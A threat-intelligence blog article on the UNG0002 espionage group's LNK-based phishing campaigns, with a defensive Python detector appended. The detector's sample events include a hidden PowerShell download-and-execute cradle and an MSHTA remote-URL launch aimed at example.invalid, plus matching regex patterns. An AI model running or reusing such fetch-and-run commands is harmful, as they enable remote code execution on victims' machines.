Who Is UNG0002?
UNG0002 is a cyber threat group. It has launched espionage campaigns against several countries in Asia.
Since May 2024, this group has targeted China, Hong Kong, and Pakistan. The attackers use shortcut (LNK) files and Remote Access Trojans (RATs) to break into systems.
Experts believe the group is based in Southeast Asia. However, their exact origin is still unknown.
Campaigns and Tactics
Researchers have tracked two major campaigns by this group: Operation Cobalt Whisper and Operation AmberMist.
Operation Cobalt Whisper ran from May to September 2024. It involved ZIP files shared through spear-phishing emails. These files carried LNK shortcuts and VBScript payloads.
These shortcuts triggered tools like PowerShell and CMD to install Cobalt Strike — a known post-exploitation tool.
Operation AmberMist occurred between January and May 2025. Attackers used resume-themed LNK files as lures. These files launched malware in stages, ending with the INET RAT and Blister DLL loader.
Why LNK Files Are Dangerous
LNK files are Windows shortcuts. Normally, they point to files or apps. However, attackers now use them to run malicious commands.
With macros disabled by default in Office, cybercriminals are turning to LNK files. These shortcuts are now part of many modern phishing strategies.
The shortcut's target invokes a trusted, built-in tool such as PowerShell, MSHTA, or CMD, which then downloads and runs the harmful files, so the initial activity looks like legitimate system behavior.
What Malware Is Being Used?
Three main types of malware appear in these campaigns:
- Shadow RAT: Allows attackers to control infected systems remotely.
- INET RAT: A variant of Shadow RAT with improved features.
- Blister DLL Loader: A stealthy implant that loads malicious code.
These tools allow full remote access, data theft, and deeper system infiltration. Attackers conceal them using DLL side-loading and shellcode injection.
Who’s Being Targeted?
The attackers focus on sectors that handle sensitive information. These include:
- Defense and aviation
- Engineering and energy
- Healthcare and academia
- Software and cybersecurity
Their goal appears to be stealing intellectual property and confidential data from these industries.
Sophisticated Tactics Reveal a Skilled Team
UNG0002’s tactics are consistent yet evolving. They use spear-phishing, fake government pages, and CAPTCHA screens to trick victims.
For example, some fake emails redirected users to lookalike government websites. These pages triggered PowerShell commands using ClickFix-style attacks.
Once inside, attackers used RATs and loaders to maintain access. The campaigns were highly targeted and technically advanced.
How to Stay Protected
To reduce the risk of attacks like these, organizations should implement strong email filtering and sandboxing tools. It’s crucial to monitor endpoint behavior and block suspicious command-line activity early.
Threat detection systems with live monitoring can help spot abnormal behavior like LNK file abuse. Regular security awareness training is also key to defending against spear-phishing emails and fake resumes.
Some protection platforms offer tools that detect LNK-based threats, block remote access implants, and respond automatically to prevent data loss.
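As an added example, not taken from the original article or from any product it refers to, the following Python scores constructed process-creation events for the pattern described in "Why LNK Files Are Dangerous" and "How to Stay Protected": an interpreter such as PowerShell, MSHTA, or CMD spawned from the Windows shell (as happens when a shortcut is double-clicked) whose command line carries hidden-window, download, remote-URL, or encoded-command indicators. The event fields, file paths, and example.invalid URLs are constructed sample data, and the indicator weights and threshold are assumptions to tune against real telemetry.

```python
import ntpath
import re

# Constructed sample process-creation events (fields modelled loosely on
# Sysmon Event ID 1 / EDR telemetry); they are not real UNG0002 artefacts.
EXPLORER = r"C:\Windows\explorer.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": EXPLORER, "image": PS,
     "cmdline": "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/r')\""},
    {"parent": EXPLORER, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/resume.hta"},
    {"parent": EXPLORER, "image": r"C:\Windows\System32\cmd.exe",  # benign: opens a document
     "cmdline": 'cmd.exe /c start "" "C:\\Users\\a\\Documents\\report.docx"'},
    {"parent": r"C:\Program Files\Code\Code.exe", "image": PS,  # benign: IDE-run build
     "cmdline": "powershell.exe -NoProfile -File build.ps1"},
]

INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}  # LNK hand-off targets

# Weighted command-line indicators (assumed weights); the threshold keeps a
# lone weak indicator such as -NoProfile from raising an alert by itself.
INDICATORS = [
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window", 2),
    (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command", 2),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), "download call", 2),
    (re.compile(r"https?://", re.I), "remote URL", 2),
    (re.compile(r"\biex\b|invoke-expression", re.I), "inline expression execution", 2),
    (re.compile(r"-nop(?:rofile)?\b", re.I), "profile suppressed", 1),
]
ALERT_THRESHOLD = 2


def score_event(event):
    """Return (score, reasons); only interpreters spawned by explorer.exe are scored."""
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    if parent != "explorer.exe" or image not in INTERPRETERS:
        return 0, []
    hits = [(name, w) for rx, name, w in INDICATORS if rx.search(event["cmdline"])]
    return sum(w for _, w in hits), [name for name, _ in hits]


def find_lnk_style_launches(events, threshold=ALERT_THRESHOLD):
    """Return one alert per event whose indicator score reaches the threshold."""
    scored = ((event, *score_event(event)) for event in events)
    return [{"image": ntpath.basename(e["image"]).lower(), "score": s, "reasons": r}
            for e, s, r in scored if s >= threshold]
```

Run against the four sample events, the PowerShell download cradle and the remote-URL MSHTA launch are flagged, while the shortcut that opens a document and the IDE-spawned build script are not.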
Sleep well, we got you covered.